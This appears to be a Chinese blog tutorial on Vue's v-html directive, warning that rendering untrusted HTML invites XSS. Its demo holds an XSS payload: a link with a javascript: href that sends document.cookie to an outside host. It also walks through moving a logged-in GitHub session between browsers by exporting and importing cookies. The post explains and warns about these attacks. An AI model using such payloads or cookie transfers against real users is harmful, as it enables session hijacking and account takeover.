Vue的v-html指令说明,含案例

v-html指令总结:

1、作用:向指定节点中渲染包含html结构的内容

2、与插值语法的区别:

(1)v-html 会替换掉节点中所有的内容,{{}}则不会

(2)v-html 可以识别html 结构

3、特别注意:

(1)在网站上动态动态渲染任意HTML是非常危险的,容易导致XSS攻击

(2)一定要在可信的内容上使用v-html,永不要在用户提交的内容上使用

案例分析:

 1、在google浏览器和火狐浏览器上安装 Cookie-Editor 插件:http://crx4.com/18460.html

 2、在google 浏览器登陆githut 账号 ,使用Cookie-Editor插件将浏览器的Cookie数据导出

 3、在火狐浏览器打开githut网站,然后删除Cookie数据,将从google浏览器导出的数据导入到火狐浏览器中,然后刷新页面,会发现火狐浏览器的githut会有登陆后的信息

(1)html

复制代码
<!DOCTYPE html>
<head>
    <title>v-html</title>
    <script type="text/javascript" src="../js/vue.js"></script>
</head>
<body>
    <div id="root">
        <div v-html="str"></div>
    </div>
</body>
<script type="text/javascript">
    Vue.config.productionTip = false
    new Vue({
        el:"#root",
        data:{
            str:'<a href=javascript:location.href="http://baidu.com?"+document.cookie>兄弟,我找到你想要的资源了,快来!</a>'
        }
    })
</script>
复制代码

(2)往页面加cookie数据

 (3)点击链接,会将系统的cookie数据传走

链接:https://www.bilibili.com/video/BV1Zy4y1K7SH?p=41&spm_id_from=pageDriver&vd_source=60a28e8364654bee938864b1d19905ec

41

posted @   codeing123  阅读(1224)  评论(0编辑  收藏  举报
相关博文:
· Vue v-once指令 和 v-pre指令
· Vue 自定义指令
· Vue之v-html指令
· Vue.js 内置指令 v-html指令&安全性问题cookie
· Vue 内置指令 v-html
阅读排行:
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
点击右上角即可分享
微信分享提示